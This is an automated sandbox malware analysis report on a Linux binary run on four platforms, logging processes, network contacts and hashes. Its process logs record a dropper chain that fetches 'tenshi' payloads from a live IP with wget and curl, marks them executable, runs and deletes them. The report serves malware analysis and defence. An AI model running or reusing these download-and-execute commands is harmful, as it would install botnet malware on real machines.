Malware Analysis Report

2024-10-16 06:21

Sample ID 240708-ddaxrsygkq
Target 296a3c4f0b173217c609be610594274f.bin
SHA256 61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b

Threat Level: Shows suspicious behavior

The file 296a3c4f0b173217c609be610594274f.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-08 02:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:06

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

2s

Max time network

132s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A
N/A /tmp/tenshiapache2 /tmp/tenshiapache2 N/A
N/A /tmp/tenshitelnetd /tmp/tenshitelnetd N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshitelnetd /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshiapache2 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

/bin/chmod

[chmod +x tenshiapache2]

/tmp/tenshiapache2

[./tenshiapache2]

/bin/rm

[rm -rf tenshiapache2]

/usr/bin/wget

[wget http://157.230.117.251/tenshitelnetd]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshitelnetd]

/bin/chmod

[chmod +x tenshitelnetd]

/tmp/tenshitelnetd

[./tenshitelnetd]

/bin/rm

[rm -rf tenshitelnetd]

Network

Country Destination Domain Proto
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
N/A 224.0.0.251:5353 udp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:07

Platform

debian9-armhf-20240611-en

Max time kernel

11s

Max time network

14s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:07

Platform

debian9-mipsbe-20240611-en

Max time kernel

123s

Max time network

154s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:08

Platform

debian9-mipsel-20240226-en

Max time kernel

111s

Max time network

117s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A
N/A /tmp/tenshiapache2 /tmp/tenshiapache2 N/A
N/A /tmp/tenshitelnetd /tmp/tenshitelnetd N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshitelnetd /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshiapache2 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

/bin/chmod

[chmod +x tenshiapache2]

/tmp/tenshiapache2

[./tenshiapache2]

/bin/rm

[rm -rf tenshiapache2]

/usr/bin/wget

[wget http://157.230.117.251/tenshitelnetd]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshitelnetd]

/bin/chmod

[chmod +x tenshitelnetd]

/tmp/tenshitelnetd

[./tenshitelnetd]

/bin/rm

[rm -rf tenshitelnetd]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f